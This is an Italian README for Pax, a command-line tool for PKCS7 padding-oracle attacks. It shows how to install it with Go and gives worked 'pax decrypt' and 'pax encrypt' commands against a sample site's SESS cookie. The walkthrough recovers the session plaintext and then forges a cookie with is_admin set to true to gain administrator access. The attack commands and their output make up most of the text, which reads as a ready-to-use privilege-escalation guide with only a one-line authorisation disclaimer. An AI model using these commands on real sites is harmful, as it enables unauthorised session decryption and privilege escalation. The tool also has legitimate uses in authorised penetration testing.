
💀 🔓 Strumento CLI per attacchi oracle di padding PKCS7
Sfrutta gli oracoli di padding per divertimento e profitto!
Pax (PAdding oracle eXploiter) è uno strumento per sfruttare gli oracoli di padding allo scopo di:
Può essere utilizzato per divulgare informazioni di sessione crittografate, e spesso per bypassare l'autenticazione, elevare i privilegi ed eseguire codice da remoto crittografando testo in chiaro personalizzato e riscrivendolo sul server.
Come sempre, questo strumento dovrebbe essere usato solo su sistemi di tua proprietà e/o per i quali hai il permesso di sondare!
Scarica dalle release, o installa con Go:
go get -u github.com/liamg/pax/cmd/pax
Se trovi un presunto oracolo, in cui i dati crittografati sono memorizzati all'interno di un cookie chiamato SESS, puoi usare quanto segue:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
Questo dovrebbe darti del testo in chiaro, magari qualcosa come:
{"user_id": 456, "is_admin": false}
Sembra che tu possa elevare i tuoi privilegi qui!
Puoi provare a farlo generando prima i tuoi dati crittografati che l'oracolo decritterà in un testo in chiaro furbo:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
Questo produrrà un altro insieme di dati crittografati codificati in base64, magari qualcosa come:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Ora puoi aprire il browser e impostare il valore del cookie SESS al valore sopra. Caricando la pagina originale dell'oracolo, dovresti vedere che sei stato elevato al livello di amministratore.
Le seguenti sono ottime guide su come funziona questo attacco: